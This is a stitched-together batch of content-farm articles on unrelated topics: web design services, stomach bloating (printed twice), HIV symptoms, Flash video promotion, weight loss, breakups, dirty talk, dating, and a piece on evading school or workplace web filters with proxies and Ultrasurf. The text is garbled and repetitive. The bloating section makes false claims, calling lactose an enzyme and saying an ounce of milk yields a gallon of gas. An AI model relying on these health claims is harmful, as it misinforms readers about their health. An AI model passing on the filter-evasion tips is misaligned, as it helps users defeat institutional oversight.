Should you be interested in getting more information on how conversions are done and what benefits you stand to gain you can do so by contacting the customer reps at any of these website design Los Angeles. These individuals will give detailed information on the effects and benefits of each program conversion. The website design Los Angeles site administrators will have good rates which are quite affordable compared to the coding website services you need.

A good website design company will affect each and every programming activity formed upon detailed information as directed by the client. However, website design company' programmers can take client's ideas to come up with good coded psd to html templates. One is always advised to hire a good website design company for any of their website needs.


Read more: http://www.articlesbase.com/internet-articles/how-to-find-a-good-psd-to-html-service-4054043.html#ixzz1BMmXUPqu
Under Creative Commons License: Attribution

Useful Tips To Relieve Bloated Stomach

Bloating is not a disease by itself. It is more of an indication of some other serious underlying medical condition related to digestive disorders such as indigestion. Nowadays with introduction of pre-packed foods, fast food and ready made food, people are opting for these kinds of food due to their hectic life style and constraint of time which in turn is causative factor for digestive disorders such as bloated stomach, trapped wind, indigestion, etc. Also irregular and unusual eating habits are other factors for bloated stomach.

Stomach bloating is when the abdomen feels full and tight, even when you have not just eaten. It most often occurs in the small intestine rather than the stomach, as most people believe. And the most common cause is irregular digestion that produces gas at a higher rate than normal. Some of the causes of bloated stomach are; eating too fast, swallowing air, eating food too fast, lactose intolerance or certain food intolerances.

Females generally suffer from a bloating known as pre-Menustral bloating. This usually occurs during the pre- Menustral cycle where legs and hands swell up.

In Medical parlance, bloated stomach is defined as excessive gas in the stomach. If you are suffering from it or not, you can identify the same using the below guidelines:
Passing of excessive gas/wind
Painful Stomach Cramps
Bloated Abdomen
Feel very uncomfortable with tight clothes

Identification of the causative factor is the key element for proper dianosis and remedy. As discussed above, pre-packaged food, ready made food contain chemical additives in small quantities which are quite harmless, but over a period of time, they build up in the body and become causative factor for bloated stomach. To identify these additives, a technique known as flat stomach can be very helpful. You can identify the cause by reducing the particular kind of food which you feel is causing the bloated stomach and once you have identified it, avoid that food and get rid of it.

If you are taking Buffalo milk regularly, it is time to minimize its intake. Buffalo milk is deficient in Lactose. Lactose is an enzyme that helps in digestion of milk by breaking glucose. As matter of fact 1 ounce of undigested milk produces one gallon of gas, hence reduction of buffalo milk can prevent bloated stomach to an extent.

Consumption of excess wheat also produces lot of gas. A protein called gluten is responsible for production of gas.

Other factors responsible for production of gas are antibiotics, sweets and salt. Excess consumption of these items results in excess production of gas; avoid eating lot of sweets and foods containing high salt.

Tips To Relieve Bloated Stomach Useful Tips To Relieve Bloated Stomach

Bloating is not a disease by itself. It is more of an indication of some other serious underlying medical condition related to digestive disorders such as indigestion. Nowadays with introduction of pre-packed foods, fast food and ready made food, people are opting for these kinds of food due to their hectic life style and constraint of time which in turn is causative factor for digestive disorders such as bloated stomach, trapped wind, indigestion, etc. Also irregular and unusual eating habits are other factors for bloated stomach.

Stomach bloating is when the abdomen feels full and tight, even when you have not just eaten. It most often occurs in the small intestine rather than the stomach, as most people believe. And the most common cause is irregular digestion that produces gas at a higher rate than normal. Some of the causes of bloated stomach are; eating too fast, swallowing air, eating food too fast, lactose intolerance or certain food intolerances.

Females generally suffer from a bloating known as pre-Menustral bloating. This usually occurs during the pre- Menustral cycle where legs and hands swell up.

In Medical parlance, bloated stomach is defined as excessive gas in the stomach. If you are suffering from it or not, you can identify the same using the below guidelines:
Passing of excessive gas/wind
Painful Stomach Cramps
Bloated Abdomen
Feel very uncomfortable with tight clothes

Identification of the causative factor is the key element for proper dianosis and remedy. As discussed above, pre-packaged food, ready made food contain chemical additives in small quantities which are quite harmless, but over a period of time, they build up in the body and become causative factor for bloated stomach. To identify these additives, a technique known as flat stomach can be very helpful. You can identify the cause by reducing the particular kind of food which you feel is causing the bloated stomach and once you have identified it, avoid that food and get rid of it.

If you are taking Buffalo milk regularly, it is time to minimize its intake. Buffalo milk is deficient in Lactose. Lactose is an enzyme that helps in digestion of milk by breaking glucose. As matter of fact 1 ounce of undigested milk produces one gallon of gas, hence reduction of buffalo milk can prevent bloated stomach to an extent.

Consumption of excess wheat also produces lot of gas. A protein called gluten is responsible for production of gas.

Other factors responsible for production of gas are antibiotics, sweets and salt. Excess consumption of these items results in excess production of gas; avoid eating lot of sweets and foods containing high salt.

HIV & AIDS Symptoms in Men – 5 Signs to Notice and to Tell if You are Infected HIV?

Have you ever experienced with unprotected sex? Are you engaged in a high-risk behavior such as sharing needles during intravenous drug use? If so, you are probably exposed to Human Immunodeficiency Virus (HIV). And when you has tested positive for HIV, it simply means you has now acquired the HIV which is the cause of AIDS.
The early signs of being infected are shown differently in men and generally happened within two to six weeks after the infection of HIV known as the acquired immunodeficiency syndrome which damages an individual's immune system. The early HIV symptoms can be concluded with these following signs:
Sign 1: Fever
Fever is one of the most common early HIV symptoms. It is occurred both in men or women. This certain symptom generally appears soon after infection. It will happen during two to four weeks, and gradually dissipate like other flues. The fever symptoms are normally mild in nature and raise body’s temperature around 100 to 101 degrees F.
Sign 2: Headache
Mostly HIV infected men will get fever with periodic stroke of mild to moderate headaches. These headaches seem normal as general headaches you have faced in everyday life.
Sign 3: Swollen Glands
In a man who is infectious he can be found with some amount of swelling or inflammation in one or more of the lymph glands in the body. He may be found with a gland in his neck, armpit or groin that has gradually become swollen, raised and firm. In general, this swelling or inflammation will not cause any kind of pain or discomfort to the gland. Besides, this symptom shown always be mistaken for another illness.
Sign 4: Fatigue
The infected men can also be found with dramatic changing of their level of energy or stamina. They can become unexplainably fatigued or tired more than general. However, physical exercise in any man can result them differently and they probably conceive that this certain feeling occur a little more tired from a day at work.
Sign 5: Rash
In early symptom of HIV it can probably happen in the form of a general rash that appears as patches of skin that are gradually discolored from other areas. The rash may show raised and simply fade away within a week to a month after it first developed.
If those signs are appeared to you, the best suggestion here is to get yourself tested. The idea of being Tested for HIV Infection may be frightening. But the HIV Testing itself doesn't bring you HIV-positive or HIV-negative result. It's very critical not only for your own health but also to prevent the transmission of the virus to others.

Streaming Video Using Flash - Your Attention Please! Read more: http://www.articlesbase.com/video-articles/streaming-video-using-flash-your-attention-please-4054884.html#ixzz1BMlIm6IF Under Creative Commons License: Attribution

You'll soon be able to stream a video using flash and get up to speed on details that you need to get to know. I did quite a bit of research on the topic, and i uncovered several interesting facts that you will need to think about. You'll soon understand how to get more visitors to your site via web videos with the assistance of this introduction - you will surely be delighted with it.
Click Here to stream a video using flash now!
In the first place, i want you to know that when you've read this brief report, you'll know what you need to do to get more visitors to your site via web videos. As you probably already know putting online videos on your web pages isn't always that trouble-free - it so happens that this is quite common and there are assorted other trouble spots that really must be taken care of. It turns out there's a key to this puzzle that may be effective; this is a special web videos training, and i'm here to tell you what you need to know. In the first place, i've learned that it teaches you how to host formats such as .MOV, and no doubt you can understand why this is a big deal. Are you familiar with the fact that it enables you to embed web videos on a specific spot on your site? So, this is an additional super important bit of knowledge.
At this point i assume that you start seeing the overall view; go through the remaining paragraphs - i'll relate even more useful data. While telling you all about it, one more hint for you came to me having to do with this solution: use it to display video clips on your site - just an idea for you to think about. Now this is only one example that occurred to me, and i would imagine you can easily conjure up your own list of suitable applications.
You have a good sense of this now, so you should now take a few moments to stream a video using flash - the details on this may have changed, so you should confirm the latest news. People everywhere seem to be very excited about this nowadays - be sure that you get up to speed on exactly what it is all about from people who can give you the inside scoop. Clearly, the subject of video marketing brings various challenges - now we are able to reap the benefits of progress and it's something we can use (though, certainly, there is still some room for improvement). Because you've gotten acquainted with this, why wait any longer than necessary to "strike while the iron is hot" and check it out for yourself - after all, what have you got to lose...? Take the information provided in this quick review and go for it; i did everything to make it as clear as possible and i trust i've succeeded in this regard.


Read more: http://www.articlesbase.com/video-articles/streaming-video-using-flash-your-attention-please-4054884.html#ixzz1BMlD0UaF
Under Creative Commons License: Attribution

11 Easy Ways to Lose Weight in 2 Weeks

Easy Ways to Lose Weight in 2 Weeks

1. Beware scale obsession - weight should come off slowly - a half pound to one pound a week - as a result of cutting junk calories while fueling your body properly for the next workout and recovery. Think of your body as a high performance engine - raise the octane of the fuel you use and stop filling when the tank is full.

2. To lose weight in 2 weeks, you have to cut down on the junk foods (not completely), stop eating out and drink less sugary drinks, including the diet kinds.

3. Eat more fresh wholesome foods and whole grain products. It's simply the best and loaded with the essential fiber to keep you satisfied longer. The simple rule is, try to get in 2 serves of fruits and 5 serves of veggies a day.

4. Make it a point each day to include a good habit like drinking one less can of coke or eating one more serve of fruit.

5. Eat 6 healthy mini meals a day to keep your stomach satisfied. The key here is eat in controlled portions and never go for that second serve or a super size meal. Stick to the 1 plate rule to keep your calorie intake at bay.

6. Even 'bad foods' can be good, in 'moderation'. The keys are portion size and cooking method. Juicy, tender cuts of steak are fatty, but are fine to eat if you trim the lard before cooking, or grill it so excess fat can drip away. As for easy guideline on portions, always eat less steak than you would chicken.

7. No matter what you've eaten, take note of how your body feels after a meal, rather than how you think you should feel. If you're still hungry later in the day, treat yourself to a piece of sweet in season fruit rather than a sugar filled snack or dessert. Then go ahead and pat yourself on the back.

8. Food is not the enemy. Food powers your brain and your muscles; without it, you'll lose your energy soon. If you missed a midday meal, eat a piece of fresh fruit or a handful of whole wheat crackers before you head for the gym.

9. How many of us slip chips and chocolate into our trolley for emergencies? It's vital to stop buying junk if you want to stop eating junk! Be strong and avoid purchasing extra snacks. You'll notice that both your grocery bill and snacking habits will start decreasing. If the foods aren't there, you can't eat them!

10. Your favorite exercise - only better - daily walker? Seasoned swimmer? You get kudos for your commitment, but you maybe short changing yourself. As you become more accustomed to your favorite activity, you burn fewer calories. This doesn't mean you have to ditch your go to exercise - just mix it up. As your fitness improves, increase the intensity levels to challenge your body (but train with in your limits). Look at jogging 100 yards followed by another hundred yards of walking, rinse and repeat. It's a great way to jolt the body's metabolism.

Alternatively, look at a combination of interval training and strength training like Turbulence Training to get the maximum output from your body - And when combined with good nutrition, it is one of the easy ways to lose weight with.

Ladies, strength training is good for you too - you will not bulk up and with muscles, you will burn more calories.

11. Use your lunch break wisely - spend half your lunch break walking. Taking a midday walk or a run can boost your energy, and reduce stress. Best yet, it gives you more time after work with family or friends.

How to Get Over Your Ex

If a person has an experience that is physically, mentally or emotionally traumatic, the mind deals with the situation in one of several different ways. Some people abuse alcohol, food, drugs or other substances to numb the feelings they have inside. Others mourn for a short period of time, restore their faith, balance and sanity, and somehow miraculously move on. But the rest of us left over, usually those who are very analytical and logical, have trouble processing deeply troubling situations. So, we replay the painful situation over and over again in our minds, searching for an answer. But the problem is, the answer cannot be found in the rational mind, because the problem is on an emotional plain. Therefore, the solution has to come from the heart, which needs to be healed and restored. Here is the step by step process I have adapted to end obsessive thinking about an Ex:
Step 1:
Don't take anything your Ex ever said or did personally, because nothing your Ex ever said or did was about you. Even if your Ex downright blames you for everything that went wrong in your relationship, realize their statement is only coming from who they are, which has absolutely nothing to do with the person you are.
Step 2:
However, not taking your Ex personally is a two sided coin. If during the heat of an argument you react and tell your Ex what an idiot THEY are, and how everything is THEIR fault, then it has nothing to do with them. Your statements only reflect the kind of person you are, which is a person who likes to blame and judge. This has nothing to do with your Ex. Therefore, consciously make an effort to be the person you are, regardless of how your Ex is behaving. Make a list of all the qualities you admire in others, for example: kindness, confidence, compassion, and respect. Chances are you already possess the qualities within yourself. Be very careful not to make statements that don't reflect who you are, even when you may be tempted to give into the hurt and anger you feel.
Step 3
Release your judgments and opinions by becoming friends with Death. As morbid as this sounds, realize that in 100 years, you and your Ex will likely be dead, and nothing you ever fought about will be remembered. If your Ex has the obsessive need to be right and argue with you about everything, give in to their whim and say, "You are absolutely right." Not only will this reinforce your relationship with Death and save you a tremendous amount of personal power, your Ex will find it impossible to argue with you because you are giving the non-verbal message that it really doesn't matter. As one my favorite authors Wayne Dyer once said, "Have you ever noticed how hard it is to argue with someone who isn't obsessed with being right?"
Step 4:
If the hurt and anger is overwhelming, distance yourself from your Ex completely. And no matter what, get on your knees and pray for your Ex every morning. Pray that your Ex will be granted all of the health, wealth and happiness you wish for yourself. Even if you are not a religious person, or you don't believe in God, the act itself is liberating.
In twelve step programs, such as Alcoholics Anonymous, they are taught to pray for people they have a deep resentment towards. At first, you will not mean a word of the prayer. But if you say the prayer consistently for two weeks, you will come to genuinely mean it, and find that there is a part of you that realizes your Ex is just a human being, with their own imperfections, weaknesses and short comings. If you go deeper, you will realize your Ex may also be a very hurt and scared person - even if they outwardly seem very hostile, aggressive and manipulative. Of course, no matter what happened to your Ex in their childhood or even in their day to day life - it does not give them a reason to mistreat you. But by being aware of the fact that your Ex has a certain set of issues to deal with on their own time, it will help you replace the hurt and anger you feel with compassion and understanding.
Step 5:
Own your personal power. Because when you are who you are, regardless of the situation or circumstance that comes your way, then this transforms you into a very powerful person. This is the step that absolutely baffles your Ex, because by you being who you are, and not letting them get you down - it sends your Ex the non-verbal message that you are who you are and they are who they are. But most importantly, it tells your Ex that you are not going to take any of their crap! When you respond to your Ex's hostility with kindness, and your Ex's blame with compassion, it frustrates them to no end, because your Ex cannot get you to play their game.
Step 6:
Come to understand that you are doing all of this work for no other reason than to realize who you are, restore your sense of balance, and reclaim your personal power. If you do all of this work in order to manipulate your Ex, and make them want you back, your Ex will subconsciously sense your intentions, because at one point or another, you will slip and let your intentions be known without realizing it. When this happens, you will give all of your power back to your Ex, and will have to start all over again with Step 1.
Step 6 is often tricky, because if you master each step up to this point, your Ex may very well want to reconcile. At the very least, your Ex will begin responding to the kindness you send their way in a positive fashion. But regardless if you want to get back together with your Ex, just be friends, or just get over the obsessive thinking - remember your sole purpose is to realize who you are, restore your sense of balance, and reclaim your personal power. If you do all of this work just to manipulate your Ex into responding the way you want them to, it may work for a very short period of time. But I guarantee your Ex will pick up on the fact that your intentions are not genuine, and you will lose your personal power. Not only that, but when you genuinely become who you are, you attract the right kind of people to your life. And maybe your Ex is not the person you are meant to be with! And the only way you will know if you are meant to be with your Ex or anyone else is if you are genuinely who you are.
Step 7:
Forgive your Ex, no matter what they did or didn't do. Unfortunately, it may not be enough at this point to say, "I forgive my ex." And leave it at that. Forgiveness has little to do with words, and more to do with action. Before proceeding with this step, I recommend reading up on the topic of forgiveness, and reading heroic stories about the power of forgiveness. I once read a story about a woman whose daughter was brutally raped and murdered by a man that was eventually caught and sent to prison. As anyone can imagine, the woman spent years of her life in rage and obsession over what this man had done to her daughter. I am sure there are no words to express how much pain this woman was feeling. However, she somehow stumbled on a book entitled, The Course of Miracles and began reading about what the power of forgiveness could do for her. She started to pray for the man, and eventually sent him a letter, letting him know she had forgiven him for the actions he took against her daughter, even though she didn't condone his behavior. To make a long story short, the man wrote the woman back and apologized profusely. The woman felt compelled to see this young man in prison, and she held him as he cried during their first visit. To make a long story short, they became friends, and she became his number one advocate in attempts to release him from prison.
There are not a lot of people walking on the planet as courageous as this woman, but it is an extreme example of what is possible within each one of us. I thought about this woman before I reached out to my Ex with forgiveness in my heart. I sent a gift to my Ex and the woman my Ex left me for, which seemed to pale in comparison to this woman's story. Of course, it took me a little over a year to reach that point, and a lot of soul searching. To this day, I love my Ex with all of my heart on a platonic level. We live in two totally different cities, but still call and send each other emails on occasion as good friends.
I am also in a healthy relationship with someone I am deeply in love with. Next week will be our two year anniversary. I do not think I would be as happy and as deeply in love with this new person as I am now, had I not let go of the anger, bitterness, and resentment I once felt towards my Ex, which is another reason why forgiveness is so important.
A lot of people believe turning off your feelings for a person you once were in a romantic relationship with, or even hating them is a way to show that they are "over" the person. But I believe the exact opposite is true. When you are completely "over" a person, you really wish them nothing but the best - and you are totally detached emotionally from how they act or react. Another point to consider is the fact that love isn't real unless you loved your Ex for the person they are, not the person you wanted them to be. And just because the romantic relationship didn't work out, doesn't mean your Ex isn't a lovable person.

How to Talk Dirty to Men

Dirty talk is a type of pillow talk. You use vivid words to augment sexual enjoyment before and during the lovemaking.

Talking dirty to men can be anything from giving him insults, vivid images using slang words, to whispering curse expressions to your guy's ear.

If you feel timid about it, don't be; only the two of you who will be aware of it.

The more you'll let go, the better you will be. Your couple's life should be hot and wild. It's a form of "sense of adventure" that you are giving to your guy.

You might say that you are a "good girl" and you don't do those things. Well here is my take on this; if you have preferences in bed, and your spouse is giving enough to fulfill them, maybe I can do my part.

Some guys find it makes them hornier. You can harvest the rewards from this lover's game. It makes you feel sexier because you are seeing your man enjoy himself due to your influence. You are providing your guy more excitement.

Lovemaking is at its best when you let go; abandon yourself to the other person is a joyful experience.
Some women use this not only in the bedroom, but in their husband's e-mail or work's voice mail.

Your guy gets excited to get home and gives you a nice "reward".

What is the top thing to say when talking dirty to men?

1. Tell him what you're wearing under your clothing.
2. Put on sexy lingerie and give him a tiny peek when he first sees you. It'll drive him mad to want to see more of your outfit all night...until you allow him to see more.
3. Leave him a voice message when he is away
4. at a gathering
5. at your parent's house when you go by him
6. right before parting for work
7. Email him some sassy notes
8. Fax it to him
9. Throw hot little texts on his cell phone while is at a sports game with his buddies

It will heat up if you are talking dirty to men at unusual places like:

1. Your parent's house
2. at the food store
3. at church?...ok...ok...after church

When is the most excellent timing for this during lovemaking?

From the mid to the end.

You start by telling a physical move that he has made to you and that you had enjoyed. Don't worry about feeling embarrassed; he will be more paying attention in the images that you are creating in his imagination.

Are you concerned that you won't be excellent at this?

Guys are not hard to light up. It doesn't take a great deal for them to get turned on.

If you feel uncomfortable, get some help with a glass or two of wine... Just to break the ice. But please! Don't develop a drinking problem!

Having trouble "getting it up"? Talking dirty to men might be able to help.

Use this once in a while; they can get too enthusiastic to this. in addition, some men can be a bit turned off or uncomfortable with you unexpectedly starting to talk dirty to them.

You can propose to him to do the alike and it will balance the dynamics.

You can get swear words at the Urban dictionary. It is a slang dictionary. You'll be able to get different variations of a slang word.

For instance, let's find a variation of breast; there is boobie, nipples, boobs, funbags, just to show a few. Use it to your imagination. Have fun!

Unblock Filtered Sites With Two Tricks

Many work places and schools are cracking down on the web sites and online services. Blocking access to social sites has been a common tactic. The most common websites that are blocked in schools include MySpace, Bebo and Facebook.

There are however always legitimate reasons to bypass the internet filters and visit the blocked websites. The following methods will help you access blocked websites in school, college or your company.

Trick A: Using a web proxy to bypass restrictions. Proxies that focus on website browsing are called web proxies. A web proxy works by acting as a "middle man": it downloads the requested pages to its proxy server and in turn you download the page, all images and other such objects from the proxy server to your browser, thus bypassing any filters and annoying firewalls.

Assban.com ( http://www.assban.com ) is a popular web proxy. You can search on Google for "myspace proxy" and find a great deal of other web proxies as well.

But chances are that your school administration has already blocked access to most web proxies as well. In that case, you have one more options:

Trick B: You can download Ultrasurf (http://www.ultrareach.com/company/download.htm ) and save it to a USB stick. UltraSurf is a green software, which means no installation process is needed nor system setting is required to change when using the software. UltraSurf implements almost all browser functions based on HTTP and user needs, such as browsing websites, login and posting on web forums, using Web mail, uploading and downloading data files, real time audio, video and other multimedia programs, etc.

The more people are aware of these tricks, the more likely your network administrators will catch on and find ways to shut them down. So be sure not to let others know how to do these tricks. Accessing unauthorized web sites using the above tricks may be considered a violation of school or work policies and might put you in trouble. Use them at your own risk.

How To Make A Girl Fall In Love With You

Let's get started. Getting a girl of your dreams is much like getting the car of your dream. But unlike a car which you can always bargain for, there is nothing like a 20 percent discount in courting the girl of your dreams, she's so sweet a thing to be discounted, you dearly are in love with her and your feelings for her can only be communicated not by the words of the mouth, but by the words of the heart. Getting the girl actually depends on how big your heart is - faint heart, never won fair lady.

The first dating idea for any man is to make a good impression. In your doing so, you don't have to talk, dress or do the common things that all the Toms do to get a decent girl's attention. Be unique, that's all you need. Be a man of his own style. Dress decently - indecency can make one be mistaken for arrogance; watch your language - obscene language gives the impression of immaturity, being uncultured and cheap; be a man of good habits - don't drink or smoke like any other loser.

How to make her fall in love with you? Take your time. Add some romance to your dating style. When in College I had a crush on the most beautiful lady in our first year lot. Though all senior guys were out to get that girl, I managed to divert her attention from the other guys. I wrote her three letters without disclosing my identity and slid into her room secretly; all I said was 'Yours Secret Admirer.' The first letter contained the meaning of her name, this I got by playing around with the initials of her name to make meaning. The second was a funny message that could only be read backwards and it was all about her physique and her smartness. In the third letter I told the girl to be ready to receive a rose flower from her admirer, but only if she could be kind enough to phone him using a number that I had included in the letter. The girl did phone me that very night, and her first words to me were, "Hallo Secret Admirer." So, the story of our love affair came to be. Later she told me that was so creative of me, no one had approached her in that manner. I made her fall in love with me and made a date in the romantic manner.

Befriending and understanding the girl you are out to get is the next important thing. This is what I also did. You have to understand that as a lady, she loves to be loved, adores to be adored and needs to be needed. This will move you closer to the girl and you'll get to know what she's into, what she likes and dislikes, and what her style is. Love is built upon friendship and it always leaves individuals better off having known each other should they break up. I and my College steady were to break some time later but to date, we are the best of buddies. Be sure that bringing out the selflessness friend in you will make her create room for you in her heart.

A shoulder to lean on and some good friend that she can always turn to is all that a lady wants. Please don't hesitate to be helpful and supportive. Be that friend who rekindles her zeal of hardworking and restoring hope back into her life when she looses hope. This above all other things will make you her daily vitamin simply because you bring out the best in her in terms of personality and character. In you, she'll have found that friend whom she can open up to, share with and advice each other on the rights and wrongs, the dos and don'ts of life. Don't forget to always be there to celebrate the good times, and to lend an ear when the girl needs you to listen as a friend.

Make the girl feel special; because she's someone's friend - your friend, and let her know that she too has touched your life in a unique way like no one else could. Compliment her for her company and for being there when you needed her, when you felt sad and all alone. Show appreciations for the comfort the girl offers you and for making you smile.

In your day to day talks, share your dreams, your world, and every aspect of your life with your girl. Always dream with her, build with her, and always cheer her on and encourage her. Tell your girl how you always think about her even when you try not to think about her. Let the girl know that she's your first thing in the morning and the last thing when you go to bed at night.

Her knowing that you were thinking of her when you slipped beneath the softness of your blanket and gave in to the bliss of sweet dreams, will make her go 'my my' and her heart will sing your name all the year round.

You have to be creative and constructive to keep girl's interest in you so full of life. I remember one time I told my girlfriend to be to imagine we are both deaf and dump. We then sat opposite each other on the table and started sharing our feelings for each other using eyes and hand signs. It turned out to be some fun. There was also this time that we were in the library and we decided we are not going to speak to each other verbal, so I wrote a love note on a paper and passed it across the table to her, she replied and on and on we carried on our love on paper conversation till we almost exhausted a whole rim of paper. At sometime, I noticed that some guys sited with us on the table were enjoying our ordeal than their studies. Such are the things that made the girl embrace my world. I remember her suggesting that we play deaf and dump two years after we broke up, can you imagine that?

Never fail to phone her, even when she least expects it. I once called some girl that I was interested in at four o'clock in the morning. When inquiring of what I was doing up so early, I told her I was in thirteenth heaven, where people think of their loved ones when they can't sleep. Wow! First thing early the next morning, she was at my door with a king-sized hug for me. No matter how many dates you take her, don't make any elbow - exceeding moves after any date, just drop her home and with a friendly handshake, wish her good night. Don't kiss her when she expects you to. Your respect as a gentleman will be earned on how patient you are with her when it comes to such matters as kissing her and accessing her inner graces.

The writing is on the wall that you want her, but you can't have her just yet. Increase your demand. Try to show her that men are also hard to get at times. Make her realize that when she feels a little dizzy, a little tired, a little sad, a little sick, a lot bored and very much cold, she's actually missing vitamin you. By this time, she'll be so much into you and since love is truthful and is characterized by open and honest communication, honestly promise her your everlasting devotion, loyalty, respect, and your unconditional love for a lifetime. Prove to her that you'll always be there for her, to listen and to hold her hand, and that you'll always do your best to make her happy, and feel loved.

Remember, patience is the key to her heart; be like that gardener watching a fruit as it hangs on the tree, day after day admiring it, but, exercising tremendous self-discipline, neither feeling the fruit, nor pinching it, nor testing it to see if it is ready. And then, one day he holds out his hand and the fruit simply drops into it, ripe, warm and eager to be eaten.

The patience and self-control which you practice will make you more attractive and charming. This will qualify you as her daily vitamin and win you that heart hers.

I wish you to meet the girl of your dreams ASAP, make her fall in love with you, and make her feel the happiest girl in the world!